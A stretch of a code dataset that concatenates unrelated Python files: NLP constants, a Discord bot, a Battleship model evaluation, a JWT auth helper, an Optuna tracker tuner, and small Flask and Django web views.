# \n\nFILE_ROOT = BASE_PATH + '/data/'\nGLOVE_VEC = BASE_PATH + '/data/pretrained_vector/glove.840B.300d.txt'\nELMO_VEC = BASE_PATH + '/data/pretrained_vector/type_elmo.npz'\nEXP_ROOT = BASE_PATH + '/model'\n\n# --- BERT ---\nBERT_ROOT = FILE_ROOT + '/bert/'\n\nBERT_UNCASED_SMALL_ROOT = BERT_ROOT + 'uncased_L-12_H-768_A-12/'\nBERT_UNCASED_SMALL_CONFIG = BERT_UNCASED_SMALL_ROOT + 'bert_config.json'\nBERT_UNCASED_SMALL_MODEL = BERT_UNCASED_SMALL_ROOT + 'pytorch_model.bin'\nBERT_UNCASED_SMALL_VOCAB = BERT_UNCASED_SMALL_ROOT + 'vocab.txt'\n\n# --- Definition ---\nDEFINITION = load_definition_dict(FILE_ROOT + '/ontology/types_definition.txt') \nDEF_VOCAB_S2I = get_definition_vocab(DEFINITION)\nDEF_VOCAB_I2S = {v: k for k, v in DEF_VOCAB_S2I.items()}\nDEF_VOCAB_SIZE = len(DEF_VOCAB_S2I) # 10473\nDEF_PAD_IDX = DEF_VOCAB_S2I[''] # 1\n\n# ------------------\n\nANSWER_NUM_DICT = {\"open\": 10331, \"onto\":89, \"wiki\": 4600, \"kb\":130, \"gen\":9}\n\nKB_VOCAB = load_vocab_dict(FILE_ROOT + \"/ontology/types.txt\", 130)\nWIKI_VOCAB = load_vocab_dict(FILE_ROOT + \"/ontology/types.txt\", 4600)\nANSWER_VOCAB = load_vocab_dict(FILE_ROOT + \"/ontology/types.txt\")\nONTO_ANS_VOCAB = load_vocab_dict(FILE_ROOT + '/ontology/onto_ontology.txt')\nANS2ID_DICT = {\"open\": ANSWER_VOCAB, \"wiki\": WIKI_VOCAB, \"kb\": KB_VOCAB, \"onto\":ONTO_ANS_VOCAB}\n\nELMO_OPTIONS_FILE = \"https://s3-us-west-2.amazonaws.com/allennlp/models/elmo/2x4096_512_2048cnn_2xhighway/elmo_2x4096_512_2048cnn_2xhighway_options.json\"\nELMO_WEIGHT_FILE = \"https://s3-us-west-2.amazonaws.com/allennlp/models/elmo/2x4096_512_2048cnn_2xhighway/elmo_2x4096_512_2048cnn_2xhighway_weights.hdf5\"\n\nTYPE_BOS_IDX = 10332\nTYPE_EOS_IDX = 10331\nTYPE_PAD_IDX = 10333\n\nopen_id2ans = {v: k for k, v in ANSWER_VOCAB.items()}\nwiki_id2ans = {v: k for k, v in WIKI_VOCAB.items()}\nkb_id2ans = {v:k for k,v in KB_VOCAB.items()}\ng_id2ans = {v: k for k, v in ONTO_ANS_VOCAB.items()}\n\nID2ANS_DICT = {\"open\": open_id2ans, \"wiki\": wiki_id2ans, \"kb\": kb_id2ans, \"onto\":g_id2ans}\nlabel_string = namedtuple(\"label_types\", [\"head\", \"wiki\", \"kb\"])\nLABEL = label_string(\"HEAD\", \"WIKI\", \"KB\")\n\nCHAR_DICT = defaultdict(int)\nchar_vocab = [u\"\"]\nwith open(FILE_ROOT + \"/ontology/char_vocab.english.txt\") as f:\n char_vocab.extend(c.strip() for c in f.readlines())\n CHAR_DICT.update({c: i for i, c in enumerate(char_vocab)})\n","repo_name":"yasumasaonoe/DenoiseET","sub_path":"resources/constant.py","file_name":"constant.py","file_ext":"py","file_size_in_byte":3392,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"27"} +{"seq_id":"18411170306","text":"import os\nimport logging\nimport discord\nfrom discord_slash import SlashCommand\nfrom dotenv import load_dotenv\nfrom discord.ext import commands\nimport builtins\n\nintents = discord.Intents.default()\nintents.members = True\n\nbot = commands.Bot(\n command_prefix='!',\n activity=discord.Game('with the discord API!'),\n intents=intents,\n)\n\n# Register the Slash command handler.\nslash = SlashCommand(bot, sync_commands=True, sync_on_cog_reload=True)\nbot.remove_command('help')\nbuiltins.bot = bot\n\nload_dotenv()\nTOKEN = os.getenv('DISCORD_TOKEN')\nGUILD = os.getenv('DISCORD_GUILD')\n\nlogger = logging.getLogger('discord')\nlogger.setLevel(logging.ERROR)\nhandler = logging.FileHandler(\n filename='discord.log',\n encoding='utf-8',\n mode='w'\n)\nhandler.setFormatter(\n logging.Formatter('%(asctime)s:%(levelname)s: 
%(message)s')\n)\nlogger.addHandler(handler)\n\n\n@bot.command()\nasync def load(ctx, extension):\n bot.load_extension(f'cogs.{extension}')\n\n\n@bot.command()\nasync def unload(ctx, extension):\n bot.unload_extension(f'cogs.{extension}')\n\n\n@bot.command()\nasync def reload(ctx, extension):\n bot.unload_extension(f'cogs.{extension}')\n bot.load_extension(f'cogs.{extension}')\n\n\"\"\"Load all files in cogs folder (remove '.py' from filename when loading)\"\"\"\nfor filename in os.listdir(f\"{__path__[0]}/cogs\"):\n if filename.endswith('.py'):\n bot.load_extension(f'src.cogs.{filename[:-3]}')\n\n\n@bot.event\nasync def on_ready():\n print(f'{bot.user.name} has joined the chat!')\n\n\nbot.run(TOKEN)\n","repo_name":"KnightHacks/DiscordBot-New","sub_path":"src/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"73933725512","text":"import Arena\nfrom MCTS import MCTS\nfrom battleship.BattleshipGame import BattleshipGame\nfrom battleship.BattleshipPlayers import *\nfrom battleship.pytorch.NNet import NNetWrapper as NNet\n\nimport matplotlib.pyplot as plt\n\n\nimport numpy as np\nfrom utils import *\nimport os\n\n\"\"\"\nuse this script to test the performance of a model trained\n\"\"\"\n\nl_random_ratio = []\nl_greedy_ratio = []\nl_v0 = []\niter_max = 100\narenaCompare = 100 #40\n\ng = BattleshipGame(6)\n\nrp = RandomPlayer(g).play\ngp = GreedyBattleShipPlayer(g).play\n\nn1 = NNet(g)\nargs = dotdict({'numMCTSSims': 50, 'cpuct': 1.0})\n\nfor iter in range(10, iter_max+1):\n\n print(iter)\n\n\n if os.path.exists('./temp/' + 'checkpoint_' + str(iter) + '.pth.tar'):\n\n n1.load_checkpoint('./temp/','checkpoint_' + str(iter) + '.pth.tar')\n\n _, v0 = n1.predict(np.zeros((6, 6)))\n l_v0.append(v0)\n\n mcts1 = MCTS(g, n1, args)\n n1p = lambda x: np.argmax(mcts1.getActionProb(x, temp=0))\n\n\n arena_r = Arena.Arena(n1p, rp, g)\n arena_g = Arena.Arena(n1p, gp, g)\n\n rpwins, rnwins, rdraws = arena_r.playGames(arenaCompare)\n gpwins, gnwins, gdraws = arena_g.playGames(arenaCompare)\n\n l_random_ratio.append((rpwins, rnwins, rdraws))\n l_greedy_ratio.append((gpwins, gnwins, gdraws))\n\nl_iter = range(10, iter_max+1)\n\nplt.plot(l_iter, l_v0, color = \"black\", label = \"estimate of the value of an ititial board by the network\")\n\nplt.plot(l_iter, [rpwins/arenaCompare for rpwins, _, _ in l_random_ratio], color = \"red\", label = \"ratio win against random agent\")\nplt.plot(l_iter, [rdraws/arenaCompare for _, rdraws, _ in l_random_ratio], color = \"yellow\", label = \"ratio draw against random agent\")\n\nplt.plot(l_iter, [gpwins/arenaCompare for gpwins, _, _ in l_greedy_ratio], color = \"blue\", label = \"ratio win against greedy agent\")\nplt.plot(l_iter, [gdraws/arenaCompare for _, gdraws, _ in l_greedy_ratio], color = \"green\", label = \"ratio draw against greedy agent\")\n\nplt.xlabel('iterations')\n\nplt.legend(loc = \"upper left\")\nplt.title(\"Performance against a random and a greedy agent\")\n\nplt.savefig(\"PerformanceBattleShip_ter.png\")\n\n\n\n\n","repo_name":"alexisbouley/alpha-zero-general","sub_path":"AnalyseResults.py","file_name":"AnalyseResults.py","file_ext":"py","file_size_in_byte":2098,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"6812334076","text":"import requests.auth\nfrom epc.common.comm import req_sess, CommException\nimport epc.common.settings as settings\nfrom 
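Two pitfalls in the evaluation loop of the AnalyseResults.py record above: results are appended only when a checkpoint file exists, while `l_iter = range(10, iter_max+1)` always spans the full range, so a single missing checkpoint makes every `plt.plot` call fail on mismatched lengths; and the "draw" series unpacks the second tuple element, which is the opponent's win count (`rnwins`/`gnwins`), not the draw count, since the tuples are built as `(pwins, nwins, draws)`. A hedged sketch of the fix:

l_iter = []
for it in range(10, iter_max + 1):          # avoids shadowing the builtin `iter`
    if os.path.exists(os.path.join('./temp/', f'checkpoint_{it}.pth.tar')):
        l_iter.append(it)                   # record the x value only when results exist
        # ... load the checkpoint and run the arenas as above ...

# Draws are the *third* element of each (wins, losses, draws) tuple.
plt.plot(l_iter, [d / arenaCompare for _, _, d in l_random_ratio],
         color='yellow', label='ratio draw against random agent')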
epc.common.platform import PlatformData\n\n\nclass EPCAuth(requests.auth.AuthBase):\n \"\"\"Custom authentication class. Currently uses JWT\"\"\"\n def __init__(self, data):\n self.data = data\n self.token = None\n\n def authenticate(self):\n \"\"\"Send the authentication request to the backend\"\"\"\n req = req_sess.post('auth', json=self.data)\n if req.ok:\n self.token = req.text\n return req.ok\n\n def response_hook(self, r, **kwargs):\n \"\"\"Handle token renewal\"\"\"\n if r.status_code == 401:\n if not self.authenticate():\n return r\n # Consume content and release the original connection\n # to allow our new request to reuse the same one.\n r.content # noqa\n r.raw.release_conn()\n request = r.request.copy()\n request.headers.update({'Authorization': 'Bearer {}'.format(self.token)})\n return r.connection.send(request, kwargs)\n return r\n\n def __call__(self, r):\n r.headers.update({'Authorization': 'Bearer {}'.format(self.token)})\n r.register_hook('response', self.response_hook)\n return r\n\n\ndef setup_auth(system_name: str) -> bool:\n \"\"\"Setup the authentication module\"\"\"\n import warnings\n warnings.warn(\"setup_auth is deprecated, use common.service\", DeprecationWarning)\n auth_data = PlatformData(system_name).get_data()\n try:\n req = req_sess.post('enroll', json=auth_data)\n if not req.ok:\n return False\n auth_data['token'] = req.text\n settings.Config().add_setting('AGENT_TOKEN', auth_data['token'])\n except CommException:\n return False\n\n req_sess.auth = EPCAuth(auth_data)\n return True\n","repo_name":"PokeSec/agentlib","sub_path":"epc/common/auth.py","file_name":"auth.py","file_ext":"py","file_size_in_byte":1864,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"41201506587","text":"import multiprocessing\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport os\nimport optuna\nimport datetime\nimport subprocess\nimport argparse\nimport joblib\n\n\ndef list_of_strings(arg):\n return arg.split(',')\n\n\ndef list_of_ints(arg):\n return [int(x) for x in arg.split(',')]\n\n\n# Converts the csv file with the target number of larvae to a dictionary\ndef csv_file_to_dict(arg):\n target_nr_dict = {}\n with open(arg, 'r') as file:\n lines = file.readlines()[1:] # Skip the first line\n for line in lines:\n # Replace ; with , to make it compatible with the German csv file #TODO: make this more general\n if ',' not in line:\n line = line.replace(';', ',')\n\n row = line.strip().split(',')\n\n # Remove all '' from the list, which occur because of different row lengths\n row = [x for x in row if x != '']\n\n # Create a list for each video, which contains tuples of (time, target_nr) values\n target_nr_dict[row[0]] = []\n for i in range(1, len(row), 2):\n # Append a tuple of (time, target_nr) to the list\n target_nr_dict[row[0]].append((float(row[i]), int(row[i + 1])))\n return target_nr_dict\n\n\nparser = argparse.ArgumentParser()\n\n# Positional arguments\nparser.add_argument('tracker', help='Tracker that should be used. 
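In `EPCAuth.response_hook` just above, the renewed request is re-sent with `r.connection.send(request, kwargs)`, which passes the hook's keyword dict as a single positional argument; `requests` transport adapters expect those settings unpacked. A minimal corrected sketch, following the same pattern `requests` itself uses for digest-auth retries:

request = r.request.copy()
request.headers.update({'Authorization': 'Bearer {}'.format(self.token)})
_r = r.connection.send(request, **kwargs)   # unpack the settings dict
_r.history.append(r)                        # keep the original 401 response attached
return _r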
Select between MWT, TIERPSY, and WF-NTP')\nparser.add_argument('working_dir', help='Working directory is expected to have a subdirectory named '\n 'TRACKER-cli for the tracker that is supposed to be used')\nparser.add_argument('video_dir', help='Path to the directory in which all video files lie in')\nparser.add_argument('target_larvae_nr', type=csv_file_to_dict,\n help='Provide a csv file with the target number of larvae to detect in each video.')\n\n# Optional arguments\nparser.add_argument('--video_names', type=list_of_strings,\n help='If you do not want to use all videos in the provided video directory, you can specify a list '\n 'of video names (including extension) that should be used for the optimization.')\nparser.add_argument('--fps', type=int, default=30,\n help='Frame rate of the videos.')\nparser.add_argument('--downsampled_fps', type=int,\n help='For WF-NTP, there is the option to downsample the '\n 'videos to a lower frame rate to speed up processing.')\nparser.add_argument('--plot', action='store_true',\n help='Plot the number of detected larvae over time for each hyperparameter set.')\nparser.add_argument('--nr_trials', type=int, default=100)\nparser.add_argument('--nr_processes', type=int, default=1,\n help=\"Number of processes (each processing one video) that should run in parallel.\")\nparser.add_argument('--debug', action='store_true', help='Print debug information.')\nparser.add_argument('--prune', action='store_true',\n help='Useful if you have more videos than processes, as it will prune unpromising trials after '\n 'processing the first video.')\n\nargs = parser.parse_args()\n\n\n# Plot number of detected larvae over time\ndef plot_nr_detected_larvae(working_dir, date_time, dataframe, tracker, video_id):\n plt.figure(figsize=(5, 3))\n\n # Get number of detected larvae for each time point\n if tracker == 'MWT' or tracker == 'TIERPSY':\n dataframe.groupby('time').larva_id.nunique().plot()\n elif tracker == 'WF-NTP':\n dataframe.groupby('time').particle.nunique().plot()\n\n # Plot target number of larvae\n x, y = [], []\n for target_time, target_nr in args.target_larvae_nr[video_id]:\n x.append(target_time)\n y.append(target_nr)\n x.append(dataframe.time.max())\n y.append(args.target_larvae_nr[video_id][-1][1])\n plt.plot(x, y, color='r', linestyle='--', label='Target Number')\n\n # Format plot\n plt.gca().set_ylim(bottom=0)\n plt.xlabel('Time in Seconds')\n plt.ylabel('Number of Detected Larvae')\n plt.title(video_id)\n plt.legend()\n\n # Save plot\n save_path = os.path.join(working_dir, 'data', 'Optuna', video_id, date_time, f'nr_larvae_tracked_{video_id}.png')\n plt.savefig(save_path, dpi=120, bbox_inches='tight')\n plt.close()\n\n\n# Processed the different output files of the trackers to get the number of detected larvae for each time point\ndef get_nr_detected_larvae_from_tracks(track_path, working_dir, date_time, tracker, video_id, video_nr):\n # track_path can be a spine file (for MWT and Tierpsy) or a track.p file (for WF-NTP)\n if tracker == 'MWT' or tracker == 'TIERPSY':\n # Save content of spine file (MWT and Tierpsy output) in a pandas dataframe\n spine_df = pd.read_csv(track_path, sep=' ', header=None)\n columns_points = []\n for i in range(1, 12):\n columns_points.extend([f'spinepoint{i}_x', f'spinepoint{i}_y'])\n spine_df.columns = ['date_time', 'larva_id', 'time'] + columns_points\n\n if args.plot:\n plot_nr_detected_larvae(working_dir, date_time, spine_df, tracker, video_id)\n return spine_df.groupby('time').larva_id.nunique()\n\n elif tracker == 
'WF-NTP':\n # Save content of track.p file (WF-NTP output) in a pandas dataframe\n df = pd.read_pickle(track_path)\n df.reset_index(drop=True, inplace=True)\n # Add time column\n df['time'] = df['frame'] / args.fps\n\n if args.plot:\n plot_nr_detected_larvae(working_dir, date_time, df, tracker, video_id)\n return df.groupby('time').particle.nunique()\n\n\n# Get hyperparameters for the tracker that should be optimized using optuna\ndef get_hyperparameters(trial, tracker):\n date_time = datetime.datetime.now().strftime('%Y%m%d_%H%M%S')\n if tracker == 'MWT':\n pixel_thr1 = trial.suggest_int('pixel-thr1', 100, 255 - 1)\n pixel_thr2 = trial.suggest_int('pixel-thr2', pixel_thr1 + 1, 255)\n size_thr1 = trial.suggest_int('size-thr1', 1, 100)\n size_thr2 = trial.suggest_int('size-thr2', 1, 100)\n\n hyperparams = (f'--frame-rate {args.fps} --pixel-thresholds {pixel_thr1} {pixel_thr2} '\n f'--size-thresholds {size_thr1} {size_thr2} --pixel-size 0.073 '\n f'--date-time {date_time}').split(' ')\n elif tracker == 'TIERPSY':\n mask_min_area = trial.suggest_int('mask-min-area', 0, 100) # 1, 50\n mask_max_area = trial.suggest_int('mask-max-area', mask_min_area, 10000) # 1e8\n thresh_C = trial.suggest_int('thresh-C', 0, 100) # 10,20\n thresh_block_size = trial.suggest_int('thresh-block-size', 50, 70) # 0, 500\n dilation_size = trial.suggest_int('dilation-size', 5, 15) # 1, 100\n strel_size = trial.suggest_int('strel-size', 4, 8)\n worm_bw_thresh_factor = trial.suggest_float('worm-bw-thresh-factor', 0.8, 1.5)\n\n hyperparams = (f'--frame-rate {args.fps} --mask-min-area {mask_min_area} --mask-max-area {mask_max_area} '\n f'--strel-size {strel_size} --worm-bw-thresh-factor {worm_bw_thresh_factor} '\n f'--thresh-block-size {thresh_block_size} --dilation-size {dilation_size} '\n f'--thresh-C {thresh_C} --pixel-size 0.073 --date-time {date_time}').split(' ')\n\n elif tracker == 'WF-NTP':\n # The hyperparameters that appear in the WF-NTP paper in Figure 11 are included here\n threshold = trial.suggest_int('threshold', 1, 20)\n opening = trial.suggest_int('opening', 1, 5)\n closing = trial.suggest_int('closing', 1, 5)\n min_size = trial.suggest_int('min-size', 10, 60)\n max_size = trial.suggest_int('max-size', min_size, 3000)\n minimum_ecc = trial.suggest_float('minimum-ecc', 0.5, 1.0)\n\n hyperparams = (f'--fps {args.fps} --px_to_mm 0.073 --threshold {threshold} --opening {opening} '\n f'--closing {closing} --min_size {min_size} --max_size {max_size} --minimum_ecc {minimum_ecc} '\n f'--skeletonize True --do_full_prune True').split(' ')\n\n # Add downsampling option if specified via command line\n if args.downsampled_fps is not None:\n print(f'Downsampling videos to {args.downsampled_fps} fps')\n hyperparams.extend(f'--downsampled_fps {args.downsampled_fps}'.split(' '))\n\n # Adjust frame rate for WF-NTP for correct downstream processing\n args.fps = args.downsampled_fps\n return hyperparams, date_time\n\n\ndef analyze_one_video(video_path, hyperparams, working_dir, date_time, video_nr, trial):\n video_id = os.path.basename(video_path).split('.')[0]\n print('Analyzing video: ', video_id)\n\n # Get the basic command for the specified tracker\n # For all trackers, the output directory is of the form: data/Optuna/VIDEO_ID/DATE_TIME\n if args.tracker == 'MWT':\n command = ['julia', '--project=.', f'src/{args.tracker.lower()}-cli.jl', video_path,\n f'./data/Optuna/{video_id}']\n elif args.tracker == 'TIERPSY':\n command = ['julia', '--project=.', f'src/{args.tracker.lower()}-cli.jl', video_path,\n 
f'./data/Optuna/{video_id}/{date_time}']\n elif args.tracker == 'WF-NTP':\n os.makedirs(f'{working_dir}/data/Optuna/{video_id}/{date_time}')\n command = ['python', f'{working_dir}/src/wf_ntp_cli.py', video_path, f'./data/Optuna/{video_id}/{date_time}']\n command.extend(hyperparams)\n\n try: # Bad Hyperparameter sets can cause errors, so we need to catch them and prune the trial\n if args.debug:\n out, err = subprocess.PIPE, subprocess.PIPE\n else:\n out, err = subprocess.DEVNULL, subprocess.DEVNULL\n\n # Run tracker for one video from working directory\n subprocess.run(command, cwd=working_dir, stdout=out, stderr=err)\n\n # Each tracker has a different name for the file that contains the tracks, so we need to handle this\n if args.tracker == 'MWT':\n spine_file_name = '20.spine'\n elif args.tracker == 'TIERPSY':\n spine_file_name = video_path.split('\\\\')[-1].split('.')[0] + '.spine'\n elif args.tracker == 'WF-NTP':\n spine_file_name = f'{video_id}_downsampled_track.p' if args.downsampled_fps != -1 else f'{video_id}_track.p'\n\n # Get number of detected larvae from output tracks\n nr_larvae_tracked = get_nr_detected_larvae_from_tracks(\n f'{working_dir}/data/Optuna/{video_id}/{date_time}/{spine_file_name}', working_dir, date_time, args.tracker,\n video_id, video_nr)\n\n except:\n # Prune optuna trial, because the hyperparameters caused an error in the tracking\n print('Exception when using hyperparameters: ', hyperparams, '\\nTrying next set of hyperparameters...')\n raise optuna.TrialPruned()\n\n # Calculate error for this video\n video_error = calculate_error(nr_larvae_tracked, video_id)\n\n # Handle pruning if specified via command line\n if args.prune:\n # Report intermedidate error\n trial.report(video_error, video_nr)\n\n # The current trial is pruned if the error is too high\n if trial.should_prune():\n print('Pruning trial because of high error for one video: ', video_error)\n raise optuna.TrialPruned()\n return video_error\n\n\n# Calculate the mean deviation of the detected number of larvae from the target number of larvae\ndef calculate_error(nr_larvae_tracked, video_id):\n # Get target number of larvae for this video\n target_nr_list = args.target_larvae_nr[video_id]\n\n cumulative_error = 0.0\n current_target_nr = np.Inf\n # Calculate cumulative error over the entire video\n for time, detected_larvae in nr_larvae_tracked.items():\n # For one time point in the output track file, get the target number of larvae\n for target_time, target_nr in target_nr_list:\n if time >= target_time:\n current_target_nr = target_nr\n elif time < target_time:\n break\n\n # Add the error for this time point (the deviation of the detected number of larvae from the actual number)\n # to the cumulative error\n cumulative_error += abs(detected_larvae - current_target_nr) / current_target_nr\n\n # Average the cumulative error over the entire video to get the mean error\n return cumulative_error / len(nr_larvae_tracked)\n\n\n# Objective function for optuna\ndef objective(trial):\n # Get hyperparameters for this trial\n hyperparams, date_time = get_hyperparameters(trial, args.tracker)\n\n video_paths = [os.path.join(args.video_dir, video_name) for video_name in list(args.video_names)]\n working_dir = f'{args.working_dir}/{args.tracker.lower()}-cli'\n\n total_error = 0.0\n # Create a list of running parameters for each video so that they can be run in parallel\n parallel_run_params = [(current_video_path, hyperparams, working_dir, date_time, video_nr, trial) for\n video_nr, current_video_path in 
enumerate(video_paths)]\n\n # Run tracker on videos in parallel, using the number or parallel processes specified in args.nr_processes\n with multiprocessing.Pool(processes=args.nr_processes) as pool:\n # Each process returns the error for one video\n errors = pool.starmap(analyze_one_video, parallel_run_params)\n\n # Calculate the cumulative error over all videos\n for video_error in errors:\n total_error += video_error\n\n # Return the mean error over all videos, representing the mean error for that set of hyperparameters\n return total_error / len(video_paths)\n\n\ndef main():\n # Check if provided tracker is supported\n if args.tracker != 'MWT' and args.tracker != 'TIERPSY' and args.tracker != 'WF-NTP':\n raise ValueError('Tracker not supported')\n\n # Obtain video names from video directory if no video names are provided\n if args.video_names is None:\n args.video_names = os.listdir(args.video_dir)\n\n # If necessary, filter video names to only include videos that are used for optimization\n # and make sure no video is missing\n if len(args.video_names) != len(args.target_larvae_nr.keys()):\n for video_name in args.video_names:\n if video_name.replace('.avi', '') not in args.target_larvae_nr.keys():\n raise ValueError(\n f'Video name {video_name.replace(\".avi\", \"\")} not found in target number of larvae dictionary.')\n # Filter dictionary to only include videos that are used for optimization\n args.target_larvae_nr = {k: v for k, v in args.target_larvae_nr.items() if k in args.video_names}\n\n print(f'Number of videos included in optimization: {len(args.video_names)}')\n\n if not os.path.exists(f'{args.working_dir}/{args.tracker.lower()}-cli/data/Optuna'):\n os.mkdir(f'{args.working_dir}/{args.tracker.lower()}-cli/data/Optuna')\n\n # Create optuna study and optimize hyperparameters\n study = optuna.create_study(direction='minimize', study_name=f'Parameter_Optimization_{args.tracker}')\n study.optimize(objective, n_trials=args.nr_trials)\n\n # Save study and results\n date_time = datetime.datetime.now().strftime('%Y%m%d_%H%M%S')\n joblib.dump(study, f'{args.working_dir}/{args.tracker.lower()}-cli/data/Optuna/{study.study_name}_{date_time}.pkl')\n df = study.trials_dataframe()\n df.to_csv(f'{args.working_dir}/{args.tracker.lower()}-cli/data/Optuna/{study.study_name}_{date_time}.csv')\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Lilly-May/larva-tagger-tune","sub_path":"ParameterOptimization.py","file_name":"ParameterOptimization.py","file_ext":"py","file_size_in_byte":15620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"39710361660","text":"from flask import Flask, request, render_template\nimport json\n\n# This script runs a Flask server for rendering a single web page which displays the\n# required metrics data. 
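Two portability notes on the `objective` function that ends above. First, `np.Inf` in `calculate_error` was removed in NumPy 2.0; `np.inf` is the stable spelling. Second, the Optuna `trial` handed into `multiprocessing.Pool.starmap` is pickled into each worker, so `trial.report`/`trial.should_prune` operate on per-process copies (and with the default in-memory storage the handle may not pickle at all). A hedged restructuring that keeps pruning in the parent process; `analyze_one_video_no_trial` is a hypothetical variant of the worker with the pruning block removed:

with multiprocessing.Pool(processes=args.nr_processes) as pool:
    errors = pool.starmap(analyze_one_video_no_trial, parallel_run_params)

for step, video_error in enumerate(errors):
    trial.report(video_error, step)    # the live trial object only exists here
    if trial.should_prune():
        raise optuna.TrialPruned()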
The data is posted regularly here by the gRPC client which computes it.\n# Scripts in the web page can then GET this data at regular intervals, for display.\n\n\n# A global dictionary for storing the metrics data.\nglobal metricsData\nmetricsData = dict()\n\n\napp = Flask(__name__)\n\n\n# This is the route that renders the dashboard web page.\n@app.route('/')\ndef index():\n return render_template(\"index.html\"); \n\n\n\n# This route allows the gRPC client to POST the metrics data.\n# It also allows the web page to GET it on demand.\n@app.route('/metrics', methods = ['POST', 'GET'])\ndef data():\n global metricsData\n if request.method == 'POST':\n metricsData = request.get_json(force = True)\n return ''\n elif request.method == 'GET':\n try:\n return metricsData\n except:\n return ''\n else:\n return ''\n\n\n \nif __name__ == '__main__':\n app.run(debug=True, host='0.0.0.0')\n\n","repo_name":"DylanOlney/SOFT8026","sub_path":"assig1/flask_server/flaskServer.py","file_name":"flaskServer.py","file_ext":"py","file_size_in_byte":1113,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"1993737158","text":"from django.http import HttpResponseRedirect, HttpResponse\nfrom django.shortcuts import render, redirect\nfrom astiasto.forms import OrderForm\nfrom django.core.mail import EmailMessage\nfrom django.shortcuts import redirect\nfrom django.template import Context\nfrom django.template.loader import get_template\nfrom astiasto.models import Item, Genre\n\ndef index(request):\n return render(request, 'main/index.html')\n\ndef about(request):\n return render(request, 'main/about.html')\n\ndef rent(request):\n items = Item.objects.all()\n genres = Genre.objects.all()\n form_class = OrderForm\n if request.method == 'POST':\n form = form_class(data=request.POST)\n if form.is_valid():\n contact_name = request.POST.get(\n 'name'\n , '')\n contact_email = request.POST.get(\n 'email'\n , '')\n form_content = request.POST.get('message', '')\n amount = request.POST.get('amount', '')\n place = request.POST.get('place', '')\n phone = request.POST.get('phone','')\n context = {\n 'contact_name': contact_name,\n 'contact_email': contact_email,\n 'form_content': form_content,\n\n\n }\n for i in Item.objects.all():\n v = i.name\n context[v] = request.POST.get(v, '')\n #for i in Item.objects.all():\n # context = {\n # context,\n\n\n # }\n\n # Email the profile with the\n # contact information\n template = get_template('contact_template.txt')\n\n content = template.render(context)\n\n email = EmailMessage(\n \"New contact form submission\",\n content,\n \"Your website\" +'',\n ['astiasto@jalostajat.fi'],\n headers = {'Reply-To': contact_email }\n )\n email.send()\n return redirect('valmis/')\n\n return render(request, 'main/rent.html', {\n 'form': form_class, 'items':items, 'genres':genres\n })\ndef ordersent(request):\n form = {}\n return render(request, 'main/thanks.html', {'form': form})\n\ndef terms(request):\n #temp = get_template('terms.txt')\n #context = {'terms': temp}\n return render(request, 'main/terms.html')\n\ndef calendar(request):\n #temp = get_template('terms.txt')\n #context = {'terms': temp}\n return render(request, 'main/calendar.html')\n","repo_name":"joelkauppi/astiasto","sub_path":"astiasto/views/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"26137573836","text":"from tkinter import 
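The `/metrics` route in the Flask record above relies on Flask (1.1+) serialising a returned dict to JSON automatically; until the first POST arrives, GET simply returns the empty dict. A small sketch of the producing side, assuming the `requests` library and the dev server's default address (both assumptions, since the gRPC client itself is not shown):

import requests, time

while True:
    metrics = {'messages_total': 42, 'avg_latency_ms': 3.7}   # hypothetical payload
    requests.post('http://localhost:5000/metrics', json=metrics)
    time.sleep(5)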
messagebox\nimport pylatex as ptx\nimport webbrowser as wb\nimport fpdf\nimport shutil\nimport time\nimport funciones.conec_mysql as conec\n\nclass convert():\n def __init__(self, arg= None):\n self.arg = arg\n self.strORlist = arg\n\n # CONVERTIR LISTA DE LISTAS DEL MODO [['8', '8'], ['9', '9']] EN UN STRING\n def list_string(self, list = None):\n if list != None:\n self.strORlist = list\n elif list == None:\n print(\"Faltan argumentos\")\n pass\n \n new_string = \"\"\n\n for i in self.strORlist:\n new_string += \",\".join(i)\n new_string += \"\\n\" \n\n return new_string\n\n # CONVERTIR UN STRING EN UNA LISTA DE LISTAS DEL MODO [['8', '8'], ['9', '9']]\n def string_list(self, string = None):\n\n if string != None:\n self.strORlist = string\n elif string == None:\n print(\"Faltan argumentos\")\n pass\n\n new_list_list = []\n for i in self.strORlist:\n string=i[:-1]\n new_list=string.split(\",\")\n new_list_list.append(new_list)\n return new_list_list\n\n\n\"\"\"##############################################################################################################\"\"\"\n# ------------------------------------------------------------------------------------------------------------------\n\n# ------------------------------------------------------------------------------------------------------------------\n\"\"\"##############################################################################################################\"\"\"\n\n# ESCRIBIR/LEER DOCUMENTO\nclass doc(convert):\n # Doc HEREDA LOS MÉTODOS DE LA CLASE CONVERT \n def __init__(self, doc = \"./documentos/data.txt\"):\n self.doc = doc\n \n def operacion(self, opcion, informacion = None):\n\n self.strORlist = informacion \n\n if opcion == \"soloE\":\n modo = \"a\"\n elif opcion == \"E\" or opcion == \"B\":\n modo = \"w\"\n elif opcion == \"L\":\n modo = \"r\"\n elif opcion == \"LE\":\n modo = \"r\"\n \n with open(self.doc, modo) as file:\n if opcion == \"soloE\" or opcion == \"E\":\n self.string = self.list_string(informacion)\n file.write(self.string)\n elif opcion == \"L\":\n L=self.string_list(file.readlines())\n del L[0]\n return L\n elif opcion == \"LE\":\n L=self.string_list(file.readlines())\n return L\n elif opcion == \"B\":\n file.write(\"\")\n\n\n\"\"\"##############################################################################################################\"\"\"\n# ------------------------------------------------------------------------------------------------------------------\n# ------------------------------------------------------------------------------------------------------------------\n\"\"\"##############################################################################################################\"\"\"\n#FUNCIONES VARIADAS QUE MODIFICAN CARACTERISTICAS Y DATOS DE LA APLICACIÓN\n\ndef cambiar_doc2(encabezado, nuevo_valor):\n 